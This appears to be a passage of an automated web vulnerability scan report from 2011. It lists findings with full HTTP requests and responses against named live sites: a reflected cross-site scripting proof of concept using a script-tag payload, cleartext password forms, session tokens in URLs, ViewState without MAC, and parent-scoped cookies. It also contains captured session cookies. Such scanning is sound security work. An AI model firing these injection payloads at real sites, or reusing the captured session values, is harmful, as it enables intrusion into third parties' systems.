Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413d0"><script>alert(1)</script>c14e9c5ba4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?413d0"><script>alert(1)</script>c14e9c5ba4b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rateyourmusic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Location: http://rateyourmusic.com/favicon.ico?413d0"><script>alert(1)</script>c14e9c5ba4b=1&413d0"><script>alert(1)</script>c14e9c5ba4b=1
MIME-Version: 1.0
Date: Fri, 01 Apr 2011 15:57:53 GMT
Server: AOLserver/4.5.0
Content-Type: text/html; charset=utf-8
Content-Length: 406
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML>
<HEAD>
<TITLE>Redirection</TITLE>
</HEAD>
<BODY>
<H2>Redirection</H2>
<A HREF="http://rateyourmusic.com/favicon.ico?413d0"><script>alert(1)</script>c14e9c5ba4b=1&413d0">
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 2 instances of this issue:


3.1. http://ecards.myfuncards.com/myfuncards/404  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecards.myfuncards.com
Path:   /myfuncards/404

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /myfuncards/404 HTTP/1.1
Host: ecards.myfuncards.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 /myfuncards/404
Date: Fri, 01 Apr 2011 15:58:17 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84745


                   
...[SNIP]...
</div>
                       <form id="loginForm" name="loginForm" method="post" action="/registration/loginAjax.jhtml">
                           <input name="loginEmail" id="loginEmail" class="inp-text" type="text" value="Email Address" />
                           <input name="loginPassword" id="loginPassword" class="inp-text" type="password" value="" />
                           <input class="inp-submit Clickable" type="submit" value="" />
...[SNIP]...

3.2. http://www.androidtapp.com/wp-login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /wp-login.php HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:58 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Content-Length: 2231
Vary: User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
   <ti
...[SNIP]...
</h1>

<form name="loginform" id="loginform" action="http://www.androidtapp.com/wp-login.php" method="post">
   <p>
...[SNIP]...
<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

4. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=357&token=EMON1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.beatthetraffic.com/widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC1-WC=^54463_2_2v0tA; __utmz=57563192.1300142889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=9731344706080960861; __utma=57563192.1578638003.1300142889.1300142889.1300142889.1; C2W4=3TQwcI7gaOg8elrf0zppGQ5W8-kjh6AzvbIlXPAjnP9LEy1n0VWmaZA; cr=15|1|-8589001706530866039|1%0a2|1|-8588996610000594670|2; V=GlchrMbA1MSR; cwbh1=357%3B03%2F30%2F2011%3BEHEX1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F12%2F2011%3BDOTM3%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5%0A541%3B04%2F23%2F2011%3BLIFL1%0A398%3B03%2F27%2F2012%3BBK078

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web82
Set-Cookie: V=GlchrMbA1MSR; Domain=.contextweb.com; Expires=Mon, 26-Mar-2012 18:11:06 GMT; Path=/
Set-Cookie: cwbh1=357%3B05%2F01%2F2011%3BEMON1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F12%2F2011%3BDOTM3%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5%0A541%3B04%2F23%2F2011%3BLIFL1%0A398%3B03%2F27%2F2012%3BBK078; Domain=.contextweb.com; Expires=Sat, 05-Mar-2016 18:11:06 GMT; Path=/
Content-Type: image/gif
Date: Fri, 01 Apr 2011 18:11:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

5. ASP.NET ViewState without MAC enabled  previous  next
There are 2 instances of this issue:


5.1. http://www.maybenow.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.maybenow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maybenow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:02:17 GMT
Content-Length: 13703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5MzA2Nzk4NzQPZBYCAgMPZBYCZhBkZBYOZg8WAh4EVGV4dAWwATxsaT48YSBocmVmPSJodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9Mb2dpbi5hc3B4IiB0aXRsZT0iTG9naW4iPkxvZ2luPC9hPiA8c3Bhbj4gfCA8L3NwYW4+IDxhIGhyZWY9Imh0dHA6Ly93d3cubWF5YmVub3cuY29tL1JlZ2lzdHJhdGlvbi5hc3B4IiB0aXRsZT0iUmVnaXN0ZXIiPlJlZ2lzdGVyPC9hPjwvbGk+ZAIBDxYCHwAFkwQ8dWwgY2xhc3M9J3dyYXBwZXInPjxsaT48YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9RQScgVGl0bGU9J1F1ZXN0aW9ucyAmYW1wOyBBbnN3ZXJzIEhvbWUnPlF1ZXN0aW9ucyAmYW1wOyBBbnN3ZXJzPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly9saXZlc3VwcG9ydC5tYXliZW5vdy5jb20nIFRpdGxlPSdDb21wYW5pZXMgJmFtcDsgUHJvZHVjdHMgU3VwcG9ydCBIb21lJz5Db21wYW5pZXMgJmFtcDsgUHJvZHVjdHMgU3VwcG9ydDwvYT48L2xpPjxsaT48YSBocmVmPSdodHRwOi8vdHJlbmRzLm1heWJlbm93LmNvbScgVGl0bGU9J1RyZW5kcyc+VHJlbmRzPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0NhdGVnb3JpZXMnIFRpdGxlPSdDYXRlZ29yaWVzJz5DYXRlZ29yaWVzPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0xlYWRlcmJvYXJkL1RvcC1Vc2Vycy1vZi1Ub2RheScgVGl0bGU9J1RvcCBVc2Vycyc+VG9wIFVzZXJzPC9hPjwvbGk+PC91bD5kAgMPFgIfAAWgAVBsZWFzZSBkb3VibGUgY2hlY2sgdGhlIFVSTCBhbmQgdHJ5IGFnYWluLjxiciAvPjxiciAvPiBZb3UgbWF5IGFsc28gZ28gdG8gPGEgaHJlZj0iaHR0cDovL3d3dy5tYXliZW5vdy5jb20iPk1heWJlTm93IEhvbWUgUGFnZTwvYT4gdG8gYnJvd3NlIG90aGVyIHN0dWZmLiBUaGFua3NkAgQPFgIfAAWpEjx1bCBjbGFzcz0nd3JhcHBlcic+PGxpPjxoNCBjbGFzcz0nZnRoNCc+UXVlc3Rpb25zICZhbXA7IEFuc3dlcnM8L2g0Pjx1bD48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vQ2F0ZWdvcmllcycgVGl0bGU9J0NhdGVnb3JpZXMnPkNhdGVnb3JpZXM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vUG9wdWxhci1RdWVzdGlvbnMtcDEnIFRpdGxlPSdQb3B1bGFyIFF1ZXN0aW9ucyc+UG9wdWxhciBRdWVzdGlvbnM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vUmVjZW50LVF1ZXN0aW9ucy1wMScgVGl0bGU9J1JlY2VudCBRdWVzdGlvbnMnPlJlY2VudCBRdWVzdGlvbnM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vVW5hbnN3ZXJlZC1RdWVzdGlvbnMtcDEnIFRpdGxlPSdVbmFuc3dlcmVkIFF1ZXN0aW9ucyc+VW5hbnN3ZXJlZCBRdWVzdGlvbnM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vQW5zd2VyZWQtUXVlc3Rpb25zLXAxJyBUaXRsZT0nQW5zd2VyZWQgUXVlc3Rpb25zJz5BbnN3ZXJlZCBRdWVzdGlvbnM8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxoNCBjbGFzcz0nZnRoNCc+VHJlbmRzPC9oND48dWw+PGxpPjxhIGhyZWY9J2h0dHA6Ly90cmVuZHMubWF5YmVub3cuY29tL1JlY2VudC1wMScgVGl0bGU9J05vdyBUcmVuZGluZyc+Tm93IFRyZW5kaW5nPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly90cmVuZHMubWF5YmVub3cuY29tL1BvcHVsYXItcDEnIFRpdGxlPSdQb3B1bGFyIFRyZW5kcyc+UG9wdWxhciBUcmVuZHM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL3RyZW5kcy5tYXliZW5vdy5jb20vUmVjZW50bHktRWRpdGVkLXAxJyBUaXRsZT0nUmVjZW50bHkgRWRpdGVkIFRyZW5kcyc+UmVjZW50bHkgRWRpdGVkIFRyZW5kczwvYT48L2xpPjxsaT48YSBocmVmPSdodHRwOi8vY2VsZWJyaXR5Lm1heWJlbm93LmNvbS90YWxhdGh1c3NhaW4nIFRpdGxlPSdTeWVkIFRhbGF0IEh1c3NhaW4nPlN5ZWQgVGFsYXQgSHVzc2FpbjwvYT48L2xpPjwvdWw+PC9saT48bGk+PGg0IGNsYXNzPSdmdGg0Jz5Db21wYW5pZXMgJmFtcDsgUHJvZHVjdHM8L2g0Pjx1bD48bGk+PGEgaHJlZj0naHR0cDovL2xpdmVzdXBwb3J0Lm1heWJlbm93LmNvbScgVGl0bGU9J0NvbXBhbmllcyAmYW1wOyBQcm9kdWN0cyBIb21lJz5Db21wYW5pZXMgJmFtcDsgUHJvZHVjdHMgSG9tZTwvYT48L2xpPjxsaT48YSBocmVmPSdodHRwOi8vbGl2ZXN1cHBvcnQubWF5YmVub3cuY29tL0NvbXBhbmllcycgVGl0bGU9J0NvbXBhbmllcyc+Q29tcGFuaWVzPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly9saXZlc3VwcG9ydC5tYXliZW5vdy5jb20vQ2F0ZWdvcmllcycgVGl0bGU9J1Byb2R1Y3RzIENhdGVnb3JpZXMnPlByb2R1Y3RzIENhdGVnb3JpZXM8L2E+PC9saT48bGk+PGEgaHJlZj0naHR0cDovL2xpdmVzdXBwb3J0Lm1heWJlbm93LmNvbS9Qcm9ibGVtcy1wMScgVGl0bGU9J1JlY2VudCBQcm9ibGVtcyc+UmVjZW50IFByb2JsZW1zPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly9saXZlc3VwcG9ydC5tYXliZW5vdy5jb20vU29sdXRpb25zLXAxJyBUaXRsZT0nUmVjZW50IFNvbHV0aW9ucyc+UmVjZW50IFNvbHV0aW9uczwvYT48L2xpPjxsaT48YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9Vc2Vycy9TdXBwb3J0L0NyZWF0ZUNvbXBhbnkuYXNweCcgVGl0bGU9J1JlZ2lzdGVyIFlvdXIgQ29tcGFueSc+UmVnaXN0ZXIgWW91ciBDb21wYW55PC9hPjwvbGk+PC91bD48L2xpPjxsaT48aDQgY2xhc3M9J2Z0aDQnPlVzZXJzPC9oND48dWw+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0xlYWRlcmJvYXJkL1RvcC1Vc2Vycy1PZi1Ub2RheScgVGl0bGU9J1RvcCBVc2VycyBvZiBUb2RheSc+VG9wIFVzZXJzIG9mIFRvZGF5PC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0xlYWRlcmJvYXJkL1RvcC1Vc2Vycy1PZi1XZWVrJyBUaXRsZT0nVG9wIFVzZXJzIG9mIFdlZWsnPlRvcCBVc2VycyBvZiBXZWVrPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL0xlYWRlcmJvYXJkL1RvcC1Vc2VycycgVGl0bGU9J1RvcCBVc2VycyBvZiBBbGwgVGltZSc+VG9wIFVzZXJzIG9mIEFsbCBUaW1lPC9hPjwvbGk+PGxpPjxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL1VzZXJzL1JlY2VudC1Vc2Vycy1wMScgVGl0bGU9J1JlY2VudCBVc2Vycyc+UmVjZW50IFVzZXJzPC9hPjwvbGk+PC91bD48L2xpPjwvdWw+ZAIFDxYCHwAFswJGT0xMT1cgVVM6IDxhIGNsYXNzPSd0d2l0aWNvbicgcmVsID0gJ25vZm9sbG93JyBocmVmPSdodHRwOi8vdHdpdHRlci5jb20vTWF5YmVOb3cnPlR3aXR0ZXI8L2E+IDxhIGNsYXNzPSdmYmljb24nIHJlbCA9ICdub2ZvbGxvdycgaHJlZj0naHR0cDovL3d3dy5mYWNlYm9vay5jb20vYXBwcy9hcHBsaWNhdGlvbi5waHA/aWQ9MTE3MDA3MTk4MTE0Jz5GYWNlYm9vazwvYT48YSBjbGFzcz0ncnNzaWNvbicgcmVsID0gJ25vZm9sbG93JyBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9GZWVkcy9SZWNlbnQtUXVlc3Rpb25zJz5SU1M8L2E+ZAIGDxYCHwAFoQc8YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9BYm91dFVzLmFzcHgnIFRpdGxlPSdBYm91dCBVcydyZWwgPSAibm9mb2xsb3ciPkFib3V0IFVzPC9hPiAmbmJzcDt8ICZuYnNwPGEgaHJlZj0naHR0cDovL3d3dy5tYXliZW5vdy5jb20vQ29udGFjdFVzLmFzcHgnIFRpdGxlPSdDb250YWN0IFVzJ3JlbCA9ICJub2ZvbGxvdyI+Q29udGFjdCBVczwvYT4gJm5ic3A7fCAmbmJzcDxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL1JlcG9ydEFCdWcuYXNweCcgVGl0bGU9J1JlcG9ydCBhIEJ1ZydyZWwgPSAibm9mb2xsb3ciPlJlcG9ydCBhIEJ1ZzwvYT4gJm5ic3A7fCAmbmJzcDxhIGhyZWY9J2h0dHA6Ly9tYXliZW5vdy51c2Vydm9pY2UuY29tLycgVGl0bGU9J1NoYXJlIElkZWFzJ3JlbCA9ICJub2ZvbGxvdyI+U2hhcmUgSWRlYXM8L2E+ICZuYnNwO3wgJm5ic3A8YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9BZHZlcnRpc2VtZW50LmFzcHgnIFRpdGxlPSdBZHZlcnRpc2Ugd2l0aCBVcydyZWwgPSAibm9mb2xsb3ciPkFkdmVydGlzZSB3aXRoIFVzPC9hPiAmbmJzcDt8ICZuYnNwPGEgaHJlZj0naHR0cDovL21heWJlbm93Lk91clRvb2xiYXIuY29tL2V4ZScgVGl0bGU9J1RyeSBvdXIgdG9vbGJhcidyZWwgPSAibm9mb2xsb3ciPlRyeSBvdXIgdG9vbGJhcjwvYT4gJm5ic3A7fCAmbmJzcDxhIGhyZWY9J2h0dHA6Ly93d3cubWF5YmVub3cuY29tL1ByaXZhY3lQb2xpY3kuYXNweCcgVGl0bGU9J1ByaXZhY3kgUG9saWN5J3JlbCA9ICJub2ZvbGxvdyI+UHJpdmFjeSBQb2xpY3k8L2E+ICZuYnNwO3wgJm5ic3A8YSBocmVmPSdodHRwOi8vd3d3Lm1heWJlbm93LmNvbS9UZXJtc09mVXNlLmFzcHgnIFRpdGxlPSdUZXJtcyBvZiBVc2UncmVsID0gIm5vZm9sbG93Ij5UZXJtcyBvZiBVc2U8L2E+ICZuYnNwOyAmbmJzcGQCBw8WAh8ABWhDb3B5cmlnaHQgwqkgMjAxMCA8YSBocmVmPWh0dHA6Ly93d3cubWF5YmVub3cuY29tIHRpdGxlPU1heWJlTm93Pk1heWJlTm93PC9hPiwgSW5jLiBBbGwgcmlnaHRzIHJlc2VydmVkLmRk" />
...[SNIP]...

5.2. http://www.nabiscoworld.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nabiscoworld.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nabiscoworld.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 9405
Vary: Accept-Encoding
Cache-Control: private, max-age=86380
Date: Fri, 01 Apr 2011 15:44:48 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<TITLE>NabiscoWorld.com</TITLE>
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cach
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" value="dDwxMDI4NDU1MzYxOztsPE1haW5fbmF2MTpNYWluX25hdl9saW5rczE6aWJsb2dpbk9uOz4+" />
...[SNIP]...

6. Cookie scoped to parent domain  previous  next
There are 122 instances of this issue:


6.1. http://www.888.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.888.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.888.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 16:09:33 GMT
Server: Microsoft-IIS/6.0
srv: 2341432
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: MainCookie=OSR=486413&RefType=NoReferrer&Srv=NO-01&Lang=en; domain=888.com; expires=Sun, 01-Apr-2012 16:09:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=42exmk55tdj1cneietsdoz45; domain=.888.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21300


<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>

<script type="text/javascript">

var sFlag = "";

var sCut = "sr=486413&lang=en&ic=5&mkw=&TestData=%3cxml%3e%3cReferrer%3e%
...[SNIP]...

6.2. http://www.dogpile.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=2de9fa38eedf4cf59191c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:17:48 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:57:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:57:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:48 GMT
Connection: close
Content-Length: 45583
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...

6.3. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /clickcallbackserver/_iceUrlFlag=1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clickcallbackserver/_iceUrlFlag=1?0=&1=0&4=173.193.214.243&5=173.193.214.243&9=62fda6b6aa3440d49bc7c16a3af0cb01&10=1&11=info.dogpl.other&14=1220&15=internal-nav&40=4JUfDDVL66gTuUrCiPIdbg%3D%3D&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:53 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=fabc047e90564b3caea8c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:01 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:01 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:00 GMT
Connection: close
Content-Length: 4



6.4. http://www.dogpile.com/clickserver/_iceUrlFlag=1  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dogpile.com
Path:   /clickserver/_iceUrlFlag=1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fwww.dailydealfetcher.com&0=&1=0&4=173.193.214.243&5=173.193.214.243&9=62fda6b6aa3440d49bc7c16a3af0cb01&10=1&11=info.dogpl.other&13=search&14=295&15=internal-nav&40=dXWTs3St9FfdeGdDtrJdnw%3D%3D&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
